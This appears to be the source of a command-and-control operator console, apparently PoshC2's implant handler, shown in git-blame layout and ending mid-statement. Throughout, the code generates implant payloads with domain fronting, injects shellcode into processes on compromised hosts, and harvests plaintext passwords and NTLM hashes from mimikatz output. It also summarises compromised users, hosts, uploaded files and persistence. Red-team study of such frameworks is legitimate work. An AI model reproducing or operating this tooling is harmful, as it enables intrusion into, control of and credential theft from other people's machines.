2018-07-23 08:55:15 +00:00
|
|
|
#!/usr/bin/python
|
|
|
|
|
2019-03-10 17:11:22 +00:00
|
|
|
import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse, datetime
|
2018-07-23 08:55:15 +00:00
|
|
|
from sqlite3 import Error
|
|
|
|
from Help import *
|
2018-12-27 12:10:46 +00:00
|
|
|
from AutoLoads import *
|
2018-07-23 08:55:15 +00:00
|
|
|
from DB import *
|
|
|
|
from Colours import *
|
|
|
|
from Config import *
|
|
|
|
from HTML import *
|
|
|
|
from TabComplete import *
|
|
|
|
from Payloads import *
|
|
|
|
from Core import *
|
2019-02-03 19:50:40 +00:00
|
|
|
from Alias import *
|
|
|
|
from Opsec import *
|
2019-03-10 17:11:22 +00:00
|
|
|
from Utils import validate_sleep_time
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
def catch_exit(signum, frame):
|
|
|
|
sys.exit(0)
|
|
|
|
|
2019-03-08 10:32:55 +00:00
|
|
|
def process_mimikatz(lines):
|
|
|
|
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
|
|
|
|
main_count = 0
|
|
|
|
current = {}
|
|
|
|
all = []
|
|
|
|
for line in lines.split('\n'):
|
|
|
|
main_count += 1
|
2019-03-10 17:11:22 +00:00
|
|
|
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
|
2019-03-08 10:32:55 +00:00
|
|
|
if val != None:
|
|
|
|
x = process_mimikatzout(current)
|
|
|
|
if x not in all:
|
|
|
|
if x != None:
|
|
|
|
all.append(x)
|
|
|
|
current = {}
|
|
|
|
current['Username'] = val.group(1).strip()
|
|
|
|
continue
|
|
|
|
|
2019-03-10 17:11:22 +00:00
|
|
|
val = re.match(r'^\s*\*\s+(Domain|NTLM|SHA1|Password)\s+:\s+(.+)\s*$', line.strip())
|
2019-03-08 10:32:55 +00:00
|
|
|
if val != None:
|
|
|
|
if val.group(2).count(" ") < 10:
|
|
|
|
current[val.group(1).strip()] = val.group(2)
|
|
|
|
|
|
|
|
return all
|
|
|
|
|
|
|
|
def process_mimikatzout(current):
|
|
|
|
fields = ['Domain','Username','NTLM','SHA1','Password']
|
|
|
|
for f in fields:
|
|
|
|
if f in current:
|
|
|
|
if current[f] == '(null)':
|
|
|
|
current[f] = ''
|
|
|
|
else:
|
|
|
|
current[f] = ''
|
|
|
|
|
|
|
|
if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
|
|
|
|
return current['Username'], current['Password'], current['NTLM']
|
|
|
|
|
2018-10-10 07:16:32 +00:00
|
|
|
def createproxypayload():
|
|
|
|
proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
|
|
|
|
proxypass = raw_input("Proxy Password: e.g. Password1 ")
|
|
|
|
proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
|
2018-12-27 12:10:46 +00:00
|
|
|
credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
|
2018-10-10 07:16:32 +00:00
|
|
|
update_item("ProxyURL", "C2Server", proxyurl)
|
|
|
|
update_item("ProxyUser", "C2Server", proxyuser)
|
|
|
|
update_item("ProxyPass", "C2Server", proxypass)
|
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
|
2018-10-10 07:16:32 +00:00
|
|
|
C2[13], C2[11], "", "", C2[19], C2[20],
|
|
|
|
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
|
|
|
|
newPayload.CreateRaw("Proxy")
|
|
|
|
newPayload.CreateDlls("Proxy")
|
|
|
|
newPayload.CreateShellcode("Proxy")
|
|
|
|
newPayload.CreateEXE("Proxy")
|
|
|
|
newPayload.CreateMsbuild("Proxy")
|
|
|
|
new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Created new proxy payloads")
|
2018-10-10 07:16:32 +00:00
|
|
|
|
|
|
|
def createdaisypayload():
|
|
|
|
name = raw_input("Daisy name: e.g. DC1 ")
|
|
|
|
domain = raw_input("Domain or URL: https://www.example.com ")
|
|
|
|
daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ")
|
|
|
|
daisyport = raw_input("Daisy port: .e.g. 8888 ")
|
|
|
|
daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ")
|
|
|
|
daisyhost = get_implantbyid(daisyhostid)
|
|
|
|
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
|
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
|
2018-10-10 07:16:32 +00:00
|
|
|
"", proxynone, C2[19], C2[20],
|
|
|
|
C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
|
|
|
|
newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
|
|
|
|
newPayload.CreateRaw(name)
|
|
|
|
newPayload.CreateDlls(name)
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload.CreateShellcode(name)
|
|
|
|
newPayload.CreateEXE(name)
|
2018-10-10 07:16:32 +00:00
|
|
|
newPayload.CreateMsbuild(name)
|
|
|
|
new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Created new %s daisy payloads" % name)
|
2018-10-10 07:16:32 +00:00
|
|
|
|
|
|
|
def createnewpayload():
|
|
|
|
domain = raw_input("Domain or URL: https://www.example.com ")
|
|
|
|
domainbase = (domain.lower()).replace('https://','')
|
|
|
|
domainbase = domainbase.replace('http://','')
|
|
|
|
domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
|
|
|
|
proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
|
|
|
|
randomid = randomuri(5)
|
|
|
|
proxyuser = ""
|
|
|
|
proxypass = ""
|
|
|
|
credsexpire = ""
|
|
|
|
if proxyurl:
|
|
|
|
proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
|
|
|
|
proxypass = raw_input("Proxy Password: e.g. Password1 ")
|
|
|
|
credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
|
|
|
|
imurl = "%s?p" % get_newimplanturl()
|
|
|
|
domainbase = "Proxy%s%s" % (domainbase,randomid)
|
|
|
|
else:
|
|
|
|
domainbase = "%s%s" % (randomid,domainbase)
|
|
|
|
imurl = get_newimplanturl()
|
|
|
|
C2 = get_c2server_all()
|
2018-12-27 12:10:46 +00:00
|
|
|
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
|
2018-10-10 07:16:32 +00:00
|
|
|
proxypass, proxyurl, "", "", C2[19], C2[20],
|
|
|
|
C2[21], imurl, PayloadsDirectory)
|
|
|
|
newPayload.CreateRaw("%s_" % domainbase)
|
|
|
|
newPayload.CreateDlls("%s_" % domainbase)
|
|
|
|
newPayload.CreateShellcode("%s_" % domainbase)
|
|
|
|
newPayload.CreateEXE("%s_" % domainbase)
|
|
|
|
newPayload.CreateMsbuild("%s_" % domainbase)
|
|
|
|
newPayload.CreatePython("%s_" % domainbase)
|
|
|
|
new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Created new payloads")
|
2018-10-10 07:16:32 +00:00
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
def argp(cmd):
|
|
|
|
args = ""
|
2018-12-27 12:10:46 +00:00
|
|
|
try:
|
2018-07-23 08:55:15 +00:00
|
|
|
parser = argparse.ArgumentParser(add_help=False)
|
|
|
|
parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False)
|
|
|
|
parser.add_argument('-Source', '-source', action='store', dest='source', required=True)
|
2018-12-27 12:10:46 +00:00
|
|
|
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
|
2018-11-15 14:10:40 +00:00
|
|
|
parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False)
|
2018-07-23 08:55:15 +00:00
|
|
|
args, unknown = parser.parse_known_args(shlex.split(cmd))
|
|
|
|
except:
|
2019-03-10 17:11:22 +00:00
|
|
|
pass
|
2018-07-23 08:55:15 +00:00
|
|
|
return args
|
|
|
|
|
|
|
|
def filecomplete(text, state):
|
2018-10-11 10:28:08 +00:00
|
|
|
os.chdir(PayloadsDirectory)
|
2018-07-23 08:55:15 +00:00
|
|
|
return (glob.glob(text+'*')+[None])[state]
|
|
|
|
|
2019-01-05 12:54:49 +00:00
|
|
|
def readfile_with_completion(message):
|
|
|
|
readline.set_completer(filecomplete)
|
|
|
|
path = raw_input(message)
|
|
|
|
t = tabCompleter()
|
|
|
|
t.createListCompleter(COMMANDS)
|
|
|
|
readline.set_completer(t.listCompleter)
|
|
|
|
return path
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
def complete(text, state):
|
|
|
|
for cmd in COMMANDS:
|
|
|
|
if cmd.startswith(text):
|
|
|
|
if not state:
|
|
|
|
return cmd
|
|
|
|
else:
|
|
|
|
state -= 1
|
|
|
|
|
|
|
|
def load_file( location ):
|
|
|
|
fr = None
|
|
|
|
try:
|
2018-12-27 12:10:46 +00:00
|
|
|
file = open((location), "rb")
|
2018-07-23 08:55:15 +00:00
|
|
|
fr = file.read()
|
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("Error loading file %s" % e)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if fr:
|
|
|
|
return fr
|
|
|
|
else:
|
|
|
|
return None
|
|
|
|
|
|
|
|
def migrate(randomuri, params=""):
|
|
|
|
implant = get_implantdetails(randomuri)
|
|
|
|
implant_arch = implant[10]
|
|
|
|
implant_comms = implant[15]
|
|
|
|
|
|
|
|
if implant_arch == "AMD64":
|
|
|
|
arch = "64"
|
|
|
|
else:
|
|
|
|
arch = "86"
|
|
|
|
|
|
|
|
if implant_comms == "Normal":
|
|
|
|
shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch))
|
|
|
|
elif implant_comms == "Daisy":
|
|
|
|
daisyname = raw_input("Name required: ")
|
2018-12-27 12:10:46 +00:00
|
|
|
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
|
2018-07-23 08:55:15 +00:00
|
|
|
elif implant_comms == "Proxy":
|
|
|
|
shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
|
|
|
|
|
2019-02-11 17:05:14 +00:00
|
|
|
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
|
|
|
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
|
|
|
|
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
|
|
|
|
|
|
|
|
def startup(user, printhelp = ""):
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
try:
|
|
|
|
if os.name == 'nt':
|
|
|
|
os.system('cls')
|
|
|
|
else:
|
|
|
|
os.system('clear')
|
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("cls")
|
|
|
|
print (chr(27) + "[2J")
|
|
|
|
print (Colours.GREEN + "")
|
|
|
|
print (logopic)
|
2019-02-12 19:12:27 +00:00
|
|
|
print ("")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
try:
|
2019-02-11 17:05:14 +00:00
|
|
|
if user is not None:
|
|
|
|
print ("User: %s" % user)
|
|
|
|
print (Colours.END)
|
2018-07-23 08:55:15 +00:00
|
|
|
ii = get_implants()
|
|
|
|
if ii:
|
|
|
|
for i in ii:
|
|
|
|
ID = i[0]
|
|
|
|
RandomURI = i[1]
|
|
|
|
LastSeen = i[7]
|
|
|
|
Hostname = i[3]
|
2019-02-06 22:29:11 +00:00
|
|
|
Domain = i[11]
|
2018-10-18 19:06:48 +00:00
|
|
|
DomainUser = i[2]
|
2018-07-23 08:55:15 +00:00
|
|
|
Arch = i[10]
|
|
|
|
PID = i[8]
|
|
|
|
Pivot = i[15]
|
|
|
|
Sleep = i[13]
|
2018-12-31 11:15:13 +00:00
|
|
|
Label = i[16]
|
2018-07-23 08:55:15 +00:00
|
|
|
if Pivot == "Daisy": Pivot = "D"
|
2018-12-28 23:06:39 +00:00
|
|
|
elif Pivot == "C#": Pivot = "C#"
|
2018-07-23 08:55:15 +00:00
|
|
|
elif Pivot == "Proxy": Pivot = "P"
|
2018-12-28 23:06:39 +00:00
|
|
|
elif Pivot == "Python": Pivot = "PY"
|
2019-01-10 10:12:14 +00:00
|
|
|
elif Pivot == "OSX": Pivot = "PY"
|
2018-12-28 23:06:39 +00:00
|
|
|
else: Pivot = "PS"
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
from datetime import datetime, timedelta
|
|
|
|
LastSeenTime = datetime.strptime(LastSeen,"%m/%d/%Y %H:%M:%S")
|
|
|
|
now = datetime.now()
|
2019-02-12 21:33:46 +00:00
|
|
|
if(Sleep.endswith('s')):
|
|
|
|
sleep_int = int(Sleep[:-1])
|
|
|
|
elif(Sleep.endswith('m')):
|
|
|
|
sleep_int = int(Sleep[:-1]) * 60
|
|
|
|
elif(Sleep.endswith('h')):
|
|
|
|
sleep_int = int(Sleep[:-1]) * 60 * 60
|
2019-03-03 18:22:40 +00:00
|
|
|
else:
|
|
|
|
print(Colours.RED)
|
|
|
|
print("Incorrect sleep format: %s" % Sleep)
|
|
|
|
print(Colours.END)
|
|
|
|
continue
|
2019-02-12 21:33:46 +00:00
|
|
|
nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3))
|
|
|
|
nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10))
|
2018-12-29 00:18:43 +00:00
|
|
|
sID = "["+str(ID)+"]"
|
2018-12-31 11:15:13 +00:00
|
|
|
if Label == None:
|
|
|
|
sLabel = ""
|
|
|
|
else:
|
|
|
|
sLabel = "["+Label+"]"
|
2019-02-12 20:21:19 +00:00
|
|
|
if nowMinus10Beacons > LastSeenTime:
|
2019-02-06 22:29:11 +00:00
|
|
|
print (Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
|
2019-02-12 20:21:19 +00:00
|
|
|
elif nowMinus3Beacons > LastSeenTime:
|
2019-02-06 22:29:11 +00:00
|
|
|
print (Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
2019-02-06 22:29:11 +00:00
|
|
|
print (Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot))
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
|
|
|
from datetime import datetime, timedelta
|
|
|
|
now = datetime.now()
|
2018-10-27 18:50:47 +00:00
|
|
|
print (Colours.RED+"No Implants as of: %s" % now.strftime("%m/%d/%Y %H:%M:%S"))
|
|
|
|
print (Colours.END+"")
|
2018-07-23 08:55:15 +00:00
|
|
|
if printhelp:
|
2018-10-27 18:50:47 +00:00
|
|
|
print (printhelp)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
t = tabCompleter()
|
|
|
|
t.createListCompleter(PRECOMMANDS)
|
|
|
|
readline.set_completer_delims('\t')
|
|
|
|
readline.parse_and_bind("tab: complete")
|
|
|
|
readline.set_completer(t.listCompleter)
|
|
|
|
history = get_history_dict()
|
|
|
|
if history:
|
|
|
|
for command in history:
|
|
|
|
try:
|
|
|
|
readline.add_history(command[1])
|
|
|
|
except:
|
|
|
|
pass
|
|
|
|
|
|
|
|
implant_id = raw_input("Select ImplantID or ALL or Comma Separated List (Enter to refresh):: ")
|
2018-10-27 18:50:47 +00:00
|
|
|
print ("")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if implant_id:
|
|
|
|
try:
|
|
|
|
last = get_lastcommand()
|
|
|
|
if last:
|
|
|
|
if last != implant_id:
|
|
|
|
new_commandhistory(implant_id)
|
|
|
|
else:
|
|
|
|
new_commandhistory(implant_id)
|
|
|
|
except Exception as e:
|
2019-03-10 17:11:22 +00:00
|
|
|
pass
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if "output-to-html" in implant_id.lower():
|
2019-02-06 16:11:18 +00:00
|
|
|
generate_table("Tasks")
|
2018-07-23 08:55:15 +00:00
|
|
|
generate_table("C2Server")
|
|
|
|
generate_table("Creds")
|
|
|
|
generate_table("Implants")
|
|
|
|
graphviz()
|
|
|
|
time.sleep(1)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-10-10 07:16:32 +00:00
|
|
|
if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()):
|
|
|
|
urls = get_c2urls()
|
|
|
|
urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
|
|
|
|
for i in urls:
|
|
|
|
urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7])
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, urlformatted)
|
2018-07-23 08:55:15 +00:00
|
|
|
if "add-autorun" in implant_id.lower():
|
|
|
|
autorun = (implant_id.lower()).replace("add-autorun ","")
|
|
|
|
autorun = autorun.replace("add-autorun","")
|
|
|
|
add_autorun(autorun)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "add-autorun: %s\r\n" % autorun)
|
2018-07-23 08:55:15 +00:00
|
|
|
if "list-autorun" in implant_id.lower():
|
|
|
|
autoruns = get_autorun()
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, autoruns)
|
2018-07-23 08:55:15 +00:00
|
|
|
if "del-autorun" in implant_id.lower():
|
|
|
|
autorun = (implant_id.lower()).replace("del-autorun ","")
|
|
|
|
del_autorun(autorun)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "deleted autorun\r\n")
|
2018-07-23 08:55:15 +00:00
|
|
|
if "nuke-autorun" in implant_id.lower():
|
|
|
|
del_autoruns()
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "nuked autoruns\r\n")
|
2018-07-23 08:55:15 +00:00
|
|
|
if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
|
2018-07-23 08:55:15 +00:00
|
|
|
if "show-serverinfo" in implant_id.lower():
|
2018-10-10 13:47:31 +00:00
|
|
|
i = get_c2server_all()
|
|
|
|
detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24])
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, detailsformatted)
|
2018-09-07 11:03:57 +00:00
|
|
|
if "turnoff-notifications" in implant_id.lower():
|
|
|
|
update_item("EnableNotifications", "C2Server", "No")
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Turned off notifications on new implant")
|
2018-09-07 11:03:57 +00:00
|
|
|
if "turnon-notifications" in implant_id.lower():
|
|
|
|
update_item("EnableNotifications", "C2Server", "Yes")
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Turned on notifications on new implant")
|
2018-07-23 08:55:15 +00:00
|
|
|
if "set-clockworksmsapikey" in implant_id.lower():
|
|
|
|
cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","")
|
|
|
|
cmd = cmd.replace("set-clockworksmsapikey","")
|
|
|
|
update_item("MobileNumber", "C2Server", cmd)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
|
2018-07-23 08:55:15 +00:00
|
|
|
if "set-clockworksmsnumber" in implant_id.lower():
|
|
|
|
cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","")
|
|
|
|
cmd = cmd.replace("set-clockworksmsnumber","")
|
|
|
|
update_item("APIKEY", "C2Server", cmd)
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
|
2018-07-23 08:55:15 +00:00
|
|
|
if "set-defaultbeacon" in implant_id.lower():
|
2019-02-12 21:33:46 +00:00
|
|
|
new_sleep = (implant_id.lower()).replace("set-defaultbeacon ","")
|
|
|
|
new_sleep = new_sleep.replace("set-defaultbeacon","")
|
|
|
|
if not validate_sleep_time(new_sleep):
|
|
|
|
print(Colours.RED)
|
|
|
|
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
|
|
|
|
print(Colours.GREEN)
|
2019-02-13 10:19:46 +00:00
|
|
|
startup(user)
|
2019-02-12 21:33:46 +00:00
|
|
|
else:
|
|
|
|
update_item("DefaultSleep", "C2Server", new_sleep)
|
|
|
|
startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
if "opsec" in implant_id.lower():
|
|
|
|
implants = get_implants_all()
|
2019-02-06 16:11:18 +00:00
|
|
|
comtasks = get_tasks()
|
2018-07-23 08:55:15 +00:00
|
|
|
hosts = ""
|
|
|
|
uploads = ""
|
2018-09-25 15:46:44 +00:00
|
|
|
urls = ""
|
2018-10-31 15:43:02 +00:00
|
|
|
users = ""
|
2019-03-08 10:32:55 +00:00
|
|
|
creds = ""
|
|
|
|
hashes = ""
|
2018-07-23 08:55:15 +00:00
|
|
|
for i in implants:
|
|
|
|
if i[3] not in hosts:
|
|
|
|
hosts += "%s \n" % i[3]
|
2018-09-25 15:46:44 +00:00
|
|
|
if i[9] not in urls:
|
|
|
|
urls += "%s \n" % i[9]
|
2018-07-23 08:55:15 +00:00
|
|
|
for t in comtasks:
|
2019-02-12 19:54:40 +00:00
|
|
|
hostname = get_implantdetails(t[1])
|
2019-03-03 18:22:40 +00:00
|
|
|
command = t[2].lower()
|
2018-10-31 15:43:02 +00:00
|
|
|
if hostname[2] not in users:
|
2019-02-12 22:14:25 +00:00
|
|
|
users += "%s\\%s @ %s\n" % (hostname[11], hostname[2],hostname[3])
|
2019-03-08 10:32:55 +00:00
|
|
|
if "invoke-mimikatz" in t[2] and "logonpasswords" in t[3]:
|
|
|
|
allcreds = process_mimikatz(t[3])
|
|
|
|
for cred in allcreds:
|
|
|
|
if cred != None:
|
|
|
|
if cred[1]:
|
|
|
|
creds += cred[0] + " Password: " + cred[1] + "\n"
|
|
|
|
if cred[2]:
|
|
|
|
hashes += cred[0] + " : NTLM:" + cred[2] + "\n"
|
2019-03-08 08:27:38 +00:00
|
|
|
if "Uploaded file" in t[3]:
|
2018-09-16 15:53:44 +00:00
|
|
|
uploadedfile = t[3]
|
2019-03-08 08:07:01 +00:00
|
|
|
uploadedfile = uploadedfile.partition(":")[2]
|
|
|
|
uploadedfile = uploadedfile.partition("\r\n")[0]
|
|
|
|
uploadedfile = uploadedfile.replace("\\\\\\\\","\\\\")
|
|
|
|
uploadedfile = uploadedfile.replace('"',"")
|
2019-03-08 08:27:38 +00:00
|
|
|
uploadedfile = uploadedfile.replace("'","")
|
2018-12-27 12:10:46 +00:00
|
|
|
uploads += "%s %s \n" % (hostname[3], uploadedfile)
|
2019-03-03 18:22:40 +00:00
|
|
|
if "uploading file" in command:
|
|
|
|
uploadedfile = command
|
|
|
|
uploadedfile = uploadedfile.partition("uploading file: ")[2].strip()
|
|
|
|
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
|
|
|
|
uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
|
|
|
|
uploadedfile = uploadedfile.strip('"')
|
|
|
|
uploads += "%s %s %s\n" % (hostname[3], uploadedfile, filehash)
|
|
|
|
if "installing persistence" in t[4].lower():
|
2018-09-03 18:02:48 +00:00
|
|
|
hostname = get_implantdetails(t[2])
|
|
|
|
line = t[4].replace('\n','')
|
|
|
|
line = line.replace('\r','')
|
2018-12-27 12:10:46 +00:00
|
|
|
filenameuploaded = line.rstrip().split(":",1)[1]
|
2018-09-03 18:02:48 +00:00
|
|
|
uploads += "%s %s \n" % (hostname[3], filenameuploaded)
|
2019-03-08 10:32:55 +00:00
|
|
|
startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
|
2018-07-23 08:55:15 +00:00
|
|
|
if "listmodules" in implant_id.lower():
|
|
|
|
mods = ""
|
|
|
|
for modname in os.listdir("%s/Modules/" % POSHDIR):
|
|
|
|
mods += "%s\r\n" % modname
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, mods)
|
2018-07-23 08:55:15 +00:00
|
|
|
if "creds" in implant_id.lower():
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "creds module not implemented yet")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if (implant_id.lower() == "pwnself" ) or (implant_id.lower() == "p"):
|
2019-01-05 12:54:49 +00:00
|
|
|
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if (implant_id.lower() == "tasks" ) or (implant_id.lower() == "tasks "):
|
|
|
|
alltasks = ""
|
2019-02-11 17:05:14 +00:00
|
|
|
tasks = get_newtasks_all()
|
2018-07-23 08:55:15 +00:00
|
|
|
if tasks is None:
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "No tasks queued!\r\n")
|
2018-07-23 08:55:15 +00:00
|
|
|
else:
|
|
|
|
for task in tasks:
|
|
|
|
imname = get_implantdetails(task[1])
|
2019-01-21 09:49:07 +00:00
|
|
|
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
|
2019-02-11 17:05:14 +00:00
|
|
|
drop_newtasks()
|
|
|
|
startup(user, "Empty tasks queue\r\n")
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if "quit" in implant_id.lower():
|
|
|
|
ri = raw_input("Are you sure you want to quit? (Y/n) ")
|
|
|
|
if ri.lower() == "n":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user)
|
2018-07-23 08:55:15 +00:00
|
|
|
if ri == "":
|
|
|
|
sys.exit(0)
|
|
|
|
if ri.lower() == "y":
|
|
|
|
sys.exit(0)
|
|
|
|
|
|
|
|
if "createdaisypayload" in implant_id.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createdaisypayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if "createproxypayload" in implant_id.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createproxypayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if "createnewpayload" in implant_id.lower():
|
2018-10-10 07:16:32 +00:00
|
|
|
createnewpayload()
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if (implant_id == "?") or (implant_id == "help"):
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, pre_help)
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if (implant_id.lower() == "history") or implant_id.lower() == "history ":
|
2019-02-11 17:05:14 +00:00
|
|
|
startup(user, get_history())
|
2018-07-23 08:55:15 +00:00
|
|
|
|
|
|
|
if "use " in implant_id.lower():
|
|
|
|
implant_id = implant_id.replace("use ","")
|
|
|
|
params = re.compile("use ", re.IGNORECASE)
|
|
|
|
implant_id = params.sub("", implant_id)
|
|
|
|
|
2019-02-11 17:05:14 +00:00
|
|
|
commandloop(implant_id, user)
|
2018-07-23 08:55:15 +00:00
|
|
|
except Exception as e:
|
2018-10-27 18:50:47 +00:00
|
|
|
